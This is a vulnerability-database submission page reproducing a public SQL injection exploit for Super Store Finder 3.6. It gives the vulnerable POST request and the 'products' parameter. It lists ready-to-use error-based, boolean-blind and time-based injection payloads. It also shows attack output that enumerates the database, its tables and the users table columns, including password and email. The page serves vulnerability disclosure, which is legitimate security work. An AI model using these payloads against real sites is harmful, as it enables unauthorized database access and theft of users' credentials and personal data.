Submit #179283: Super Store Finder 3.6 - SQL Injectioninfo

Title	Super Store Finder 3.6 - SQL Injection
Description	# Exploit Title: Super Store Finder 3.6 - SQL Injection # Date: 07/07/2023 # Exploit Author: skalvin aka (CraCkEr) # Vendor: Super Store Finder # Vendor Homepage: https://superstorefinder.net/products/superstorefinder/index.php # Software Link: https://codecanyon.net/item/super-store-finder/3630922 # Version: 3.6 # Tested on: Windows 10 Pro # Impact: Database Access Release Notes: SQL injection attacks can allow unauthorized access to sensitive data, modification of data and crash the application or make it unavailable, leading to lost revenue and damage to a company's reputation. Path: /index.php --------------------------------------------------------------------------------- POST /products/superstorefinder/index.php HTTP/1.1 ajax=1&action=get_nearby_stores&distance=200&lat=40.7127753&lng=-74.0059728&products=[SQLI] --------------------------------------------------------------------------------- POST parameter 'products' is vulnerable to SQL Injection --- Parameter: products (POST) Type: error-based Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) Payload: ajax=1&action=get_nearby_stores&distance=200&lat=40.7127753&lng=-74.0059728&products=347' AND GTID_SUBSET(CONCAT_WS(0x28,0x496e6a65637465647e,0x72306f746833783439,0x7e454e44),1337)-- wXyW Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: ajax=1&action=get_nearby_stores&distance=200&lat=40.7127753&lng=-74.0059728&products=347' AND 04872=4872-- wXyW Type: time-based blind Title: MySQL >= 5.0.12 time-based blind (IF - comment) Payload: ajax=1&action=get_nearby_stores&distance=200&lat=40.7127753&lng=-74.0059728&products=347'XOR(IF(now()=sysdate(),SLEEP(6),0))XOR'Z --- [+] Starting the Attack fetching current database current database: 'superstor_***' fetching tables [8 tables] +--------------+ \| categories_b \| \| categories \| \| stores_c \| \| categories_c \| \| stores_b \| \| users_b \| \| users \| \| stores \| +--------------+ fetching columns for table 'users' [11 columns] +-------------+ \| id \| \| username \| \| password \| \| firstname \| \| lastname \| \| facebook_id \| \| address \| \| email \| \| created \| \| modified \| \| status \| +-------------+ [-] Done
User	skalvin (UID 49463)
Submission	07/07/2023 20:52 (3 years ago)
Moderation	07/18/2023 18:23 (11 days later)
Status	Accepted
VulDB entry	234421 [Super Store Finder 3.6 POST Parameter /index.php Products sql injection]
Points	17

◂ Previous Overview Next ▸

Might our Artificial Intelligence support you?

Check our Alexa App!